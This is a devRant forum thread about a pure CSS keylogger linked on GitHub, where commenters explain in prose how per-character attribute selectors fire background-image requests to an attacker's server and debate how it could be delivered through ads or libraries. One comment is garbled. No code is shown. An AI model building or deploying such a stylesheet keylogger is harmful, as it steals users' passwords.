Ranter
Join devRant
Do all the things like
++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatar
Sign Up
Pipeless API
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple API
Learn More
Comments
-
peiche3037yIt's possible because it makes a request through the background-image. If the property changes (like when the selector which didn't match an element suddenly does by wildcards), a new request could be made. So you can make a different selector for each letter, and monitor the sequence of calls to your server. Voila, keylogger.
-
lotd77757y@Vip3rDev for each character input into a type=password,
it requests a background image thats probably blank..
Im almost always curiously peeking the network tab, so i would probably see it..
Guess i could use it against, by visiting from a bunch of machines, crunching through a wordlist :p -
webnoob11027y@peiche – I understand _how_ it works. I meant "from a security standpoint, how could the potential of this breach not have raised flags earlier."
-
Oh, I get what you mean @lotd, I typically have dev tools open when browsing too just from habit. But now I have even more reason to pay attention to the network tab!
-
drekhi18027yShit those motherfuckers were right who were saying CSS is a programming language. 😅😕🤔🤐
-
gitgood07yJust before people start worrying about this, just know that for this to actually be exploited the malicious user would have to have access to the javascript/css being served from the contaminated page. If they do have this access, then there are much bigger issues to worry about.
The most "straight forward" and realistic scenario I could ever think of this being used is if Bob uses a CSS library that contains the contaminated code that makes the key logging requests to the malicious server? I'm not sure it's something to be worried about, just cautious of! -
@gitgood
> access to the javascript/css being served from the contaminated page
You mean like all advertisements on the web?
@lotd Many websites continuously fire off ajax requests, and it could look a lot more obfuscated.
@CapnHammered Most users don't have totally random passwords. If it logs "ChdrlCharlie123" I could guess the pet name, and where the backspacing happened... -
https://instagram.com.”s to affect controlled components like React. It also states it in the repo “Open a website that uses a controlled component framework such as React. https://instagram.com.”
Related Rants
K but why is this even possible through CSS...
Linked below is a pure CSS keylogger, i.e., now you can get your passwords stolen through a stylesheet. Keep your head on a swivel kids.
https://github.com/maxchehab/...
rant
css
keylogger
security